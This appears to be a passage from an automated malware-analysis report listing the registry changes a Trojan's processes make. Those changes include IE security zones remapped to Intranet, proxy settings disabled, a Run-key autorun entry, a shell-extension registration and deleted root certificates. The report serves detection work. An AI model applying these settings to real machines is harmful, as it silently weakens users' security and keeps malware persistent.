[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"On" = "0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level" = ""

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level"

The process FhCalendar.exe:452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 49 09 89 D2 FF E1 F4 98 54 56 A4 80 9E BA 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"update.exe" = "Update 应用程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process FhCalendar.exe:588 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "FhCalendar.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1402636056"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 35 70 F7 CB 16 DA C6 8E 5B CD E0 CF CD 6F 2A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wujiime.exe:464 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayVersion" = "3.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\VERSION]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"Publisher" = "Wuji"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"UninstallString" = "%Program Files%\Wuji\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}]
"(Default)" = "pIContextMenu.ShellExt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\ProgID]
"(Default)" = "pIContextMenu.ShellExt"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\0\win32]
"(Default)" = "%System%\catsrvuz.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"URLInfoAbout" = "Wj"

[HKCR\Directory\Background\shellex\ContextMenuHandlers\with]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"(Default)" = "%System%\catsrvuz.dll"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0]
"(Default)" = "IContextMenu wj"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}]
"(Default)" = "_ShellExt"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\pIContextMenu.ShellExt\Clsid]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 A2 42 55 B5 34 36 CF C2 A6 05 52 4A B4 70 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayName" = "无极输入法 3.6"

[HKCU\Software\VB and VBA Program Settings\jcity\tj]
"nt" = "55"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\pIContextMenu.ShellExt]
"(Default)" = "pIContextMenu.ShellExt"

[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process MSIB.tmp:916 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 5B 7B 66 1D D9 48 61 68 AD 61 12 39 C3 6E 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\xxdd]
"SportLive.exe" = "直播中心"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process xxdd_165.exe:452 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 12 9D AB 46 B0 B5 90 35 C3 17 34 CC 48 AC 4B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process updroots.exe:1016 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 71 72 94 D7"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 D8 B5 FB 36"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"File"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5"

The process 114gglm_016.exe:488 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 59 8D 28 D9 17 87 C6 FB 54 26 9D 38 F0 38 15"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"file" = "114gglm_016"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto"

The process Update.exe:444 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 55 5A 20 7D FB DF 55 8B 27 30 96 FA A1 F4 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process fhrl_6_12001.exe:320 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\thyz\FhCalendar.exe]
"(Default)" = "%Program Files%\fhrl\FhCalendar.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"DisplayName" = "·çºÍÈÕÀú 1.00.001"
"DisplayVersion" = "1.00.001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"UninstallString" = "%Program Files%\fhrl\Fhuninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"URLInfoAbout" = "http://www.fhrlw.com"
"DisplayIcon" = "%Program Files%\fhrl\FhCalendar.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\·çºÍÈÕÀú]
"Publisher" = "Ìƺ²Ò×ÕßÐÅÏ¢¼¼ÊõÓÐÏÞ¹«Ë¾"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 7F ED 19 00 E5 EE 7D 60 1D 7F 38 E2 5F C3 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process fhsli_6_12001.exe:1852 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 04 CF D3 52 C8 23 F1 5E 97 A3 33 40 02 19 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process netsh.exe:436 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

